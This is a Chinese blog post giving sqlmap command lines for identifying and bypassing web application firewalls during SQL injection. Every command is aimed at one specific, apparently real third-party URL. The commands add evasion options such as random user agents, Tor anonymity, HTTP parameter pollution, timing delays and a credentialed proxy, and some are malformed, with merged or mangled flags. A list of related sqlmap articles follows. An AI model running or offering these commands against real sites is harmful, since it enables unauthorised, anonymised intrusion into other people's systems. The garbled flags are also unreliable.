SQLmap————9、使用参数绕防火墙

最新推荐文章于 2023-12-26 12:00:00 发布
最新推荐文章于 2023-12-26 12:00:00 发布
阅读量650 收藏 7
点赞数 2
分类专栏: # SQLmap 【渗透工具】

检测web服务是否受到防火墙保护

首选

sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4--thread 10   --identify-waf

备选

sqlmap -uhttp://yiliao.kingdee.com/contents.php?id=51&types=4 –thread 10    --check-waf

使用参数绕防火墙

使用任意浏览器进行绕过,尤其是在WAF配置不当的时候

sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4    --random-agent -v2

禁止使用系统的代理,直接连接进行注入

sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4    --ignore-proxy

清空会话,重构注入

sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4  --flush-session

使用参数--no-cast ,进行字符码转换

sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4  --hex

对移动端的服务器进行注入

sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4 –mobile

匿名注入

sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4  –tor

使用HTTP 参数污染进行绕过,尤其是在ASP.NET/IIS 平台上

sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4    --hpp-v 3

使用长的延时来避免触发WAF的机制,这方式比较耗时

sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4    --delay=3.5 --time-sec=60

使用代理进行注入

Sqlmap -u  http://yiliao.kingdee.com/contents.php?id=51&types=4   --proxy=211.211.211.211:8080 

              --proxy-cred=211:985

FLy_鹏程万里
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web应用手工渗透测试——用SQLMap进行SQL盲注测试
02-26
本文主要关注SQL注入,假设读者已经了解一般的SQL注入技术,在我之前的文章中有过介绍,即通过输入不同的参数,等待服务器的反应,之后通过不同的前缀和后缀(suffixandprefix)注入到数据库。本文将更进一步,讨论SQL...
渗透测试必备神器SQLMAP的所有waf脚本合集
10-18
SQLMAP利用这一点,通过构造特定的SQL语句,防火墙的检测,直达数据库。 具体来说,SQLMAP首先会尝试猜测应用程序所使用的数据库类型(如MySQL、Oracle等),然后根据该数据库类型的语法和特性,构造出特定的...
我的SQLmap使用方法(详解)
weixin_41182861的博客
05-12 4127
SQLMAP是一个由Python语言编写的开源渗透测试工具,它主要用来检测sql注入漏洞(sql盲注、union查询、显错注入、延迟注入、post注入、cookie注入等),是一款功能强大的sql漏洞检测利用工具。sqlmap可以检测的数据库有:access、mssql、mysql、oracle、postgresql、db2、sqlite等。其他功能:执行命令、列举用户、检测权限、自动破解、数据导出等功能。...
渗透测试工具sqlmap基础教程
不知火猪
03-05 1209
渗透测试工具sqlmap基础教程,从入门到精通 本文仅献给想学习渗透测试的sqlmap小白,大牛请过。 对于网络安全人员来说,掌握渗透工具的使用方法是一项必备的技能。然而,一个没有师傅带领的小白在刚开始学习时,并不知道该如何入手进行渗透学习,所以本文旨在帮助这些小白入门。 sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞。它由python语言开发而成,因此...
SQLMAP工具详解
weixin_56218159的博客
06-02 1962
免责声明 该文章仅用于信息防御技术的交流和学习,请勿用于其他用途; 在未得到网站授权前提下,禁止对政府、事业单位、企业或其他单位网站及系统进行渗透测试;技术是把双刃剑,请遵纪守法,做一名合格的白帽子安全专家,为国家的网络安全事业做出贡献; ...
sqlmap使用详解(三:防火墙
→_→
10-11 1982
目录 0x01 确认WAF 0x02 使用参数进行过 0x03 使用脚本介绍 1 使用格式: 2 脚本总类 0x04脚本参数组合策略过 1 mysql过: 2 MSSQL: 3 ms access: 4Oracle: 5 建议: 0x01 确认WAF 首先我们判断该Web 服务器是否被WAF/IPS/IDS保护着。这点很容易实现,因为我们在漏扫或者使用专门工具来检测是否有WAF,这个检测,在nmap 的NSE,或者WVS的策略或者APPSCAN的策略中都有,我...
sqlmap常用指令
a_running_snail_的博客
06-20 1265
Sqlmap笔记 sqlmap -u 注入点 检测注入点是否可用 sqlmap -u 注入点 –batch 自动输入 暴库 sqlmap -u 注入点 –dbs //暴库 Web当前使用的数据库 sqlmap -u 注入点 –current-db //爆当前使用的库 Web数据库使用的账户 sqlmap -u 注入点 ...
SQLMAP使用笔记.pdf
01-25
SQLMAP使用笔记
SQLMAP神器使用.pdf
01-05
sqlmap常见的命令使用以及实验步骤和方法
sqlmap的一些脚本的使用过滤的神器
11-26
sql注入神奇,搭配各种脚本,花式过滤,懂的人自然懂,哈哈,欢迎下载
网络安全-sqlmap学习笔记
关注网络安全、云原生安全
06-08 5858
介绍 检测和利用SQL注入的工具。 命令参数 参数解释 参数 含义 描述 -h,--help 帮助 显示基本帮助消息并退出 -hh 高级帮助 显示高级帮助消息并退出 --version 版本 显示程序的版本号并退出 -u,-url=URL URL 目标URL(例如“ http://www.site.com/vuln.php?id=1”) -d DIRECT 连接字符串,用于数据库直接连接 -l .
使用sqlmap 防火墙进行注入测试
煜铭2011
04-20 4万+
0x00 前言 现在的网络环境往往是WAF/IPS/IDS保护着Web 服务器等等,这种保护措施往往会过滤挡住我们的SQL注入查询链接,甚至封锁我们的主机IP,所以这个时候,我们就要考虑怎样进行过,达到注入的目标。因为现在WAF/IPS/IDS都把sqlmap 列入黑名单了,呵呵!但是本文基于sqlmap 进行过注入测试,介绍至今仍然实用有效的技巧,以下策略在特定的环境能够成功...
超详细SQLMap使用攻略及技巧分享
最新发布
Y525698136的博客
12-26 929
sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。
sqlmap --tamper WAF脚本分类整理
热门推荐
whatday的专栏
01-29 5万+
支持的数据库 编号 脚本名称 作用 实现方式 all 1 apostrophemask.py 用utf8代替引号 ("1 AND '1'='1")  '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'  2 base64encode.py  用base64编码替换 ("1' A
SQLMAP渗透笔记之WAF防火墙
Birdman-one的博客
12-26 1万+
---------------------------------------------------------------------------------------------                 SQLMAP渗透笔记之WAF防火墙 ------------------------------------------------------------
Sqlmap 识别 WAF
andiao1218的博客
09-11 2436
命令: ┌─[root@sch01ar]─[~] └──╼ #sqlmap -u "http://www.sch01ar.com/" --identify-waf --batch 运行结果 如果使用WAF 没有什么特征,Sqlmap 识别出来的类型会是 Generic (Unknown) 在 Sqlmap 的安装目录下的 waf 目录中存放着相关的 waf ...
sqlmapwaf脚本及目录介绍
司令2017的博客
04-26 5312
sqlmap 的源码学习笔记一之目录结构 0x00 前言 sqlmap 是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。本文重点研究sqlmap的软件具体的目录结构,后续的文章也会从源码编写
sqlmapwaf详解
净邪的博客
07-13 5233
WAF又称web应用防火墙,因为它的出现可以忽略很多应用漏洞,但并不是所有waf都可以通过sqlmap过,整理了一部分仅供参考sqlmap可以通过脚本拓展的方式调用模块对注入进行参数“打乱”以此达到过的效果可以使用命令–tamper 来调用脚本脚本调用大全:https://blog.csdn.net/hxsstar/article/details/22782627命令也大同小异,例如:sqlm...
sqlmap
bylfsj的博客
09-23 6526
目录 Sqlmap Sqlmap的简单用法 探测指定URL是否存在WAF,并且过 探测指定URL是否存在SQL注入漏洞 查看数据库的所有用户 查看数据库所有用户名的密码  查看数据库当前用户  判断当前用户是否有管理权限 列出数据库管理员角色 查看所有的数据库 查看当前的数据库 爆出指定...
sqlmap防火墙
08-29
SQLMap是一款常用的自动化SQL注入工具,它能够帮助渗透测试人员快速检测和利用应用程序中的SQL注入漏洞。然而,防火墙并不是SQLMap的主要功能,因为防火墙往往是由网络管理员配置和管理的,目的是保护网络安全。 如果你想在使用SQLMap防火墙,我强烈建议你停止这样的行为。防火墙可能违反法律法规,并且可能会对目标网络和系统造成不可预测的风险。更重要的是,合法的渗透测试应该在合规和授权的情况下进行。 如果你是网络管理员或安全专业人员,并且有正当的理由需要测试防火墙的安全性,我建议你与网络管理员或相关的授权方进行沟通,并确保你获得了明确的授权。在任何情况下,请遵守适用的法律法规和道德准则。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值